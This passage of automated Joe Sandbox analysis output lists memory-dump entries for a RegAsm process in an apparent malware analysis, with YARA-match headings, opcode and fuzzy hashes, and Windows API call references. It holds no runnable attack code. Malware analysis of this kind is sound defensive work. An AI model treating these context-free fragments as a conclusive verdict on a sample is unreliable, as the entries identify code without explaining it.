                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ObjectProcessSingleTerminateWait
                                  • String ID: pth_unenc
                                  • API String ID: 1872346434-4028850238
                                  • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                  • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                  • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                  • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                  • GetLastError.KERNEL32 ref: 00440D35
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                  • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                  • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                  • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                  • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                  • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastRead
                                  • String ID:
                                  • API String ID: 4100373531-0
                                  • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                  • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                  • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                  • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99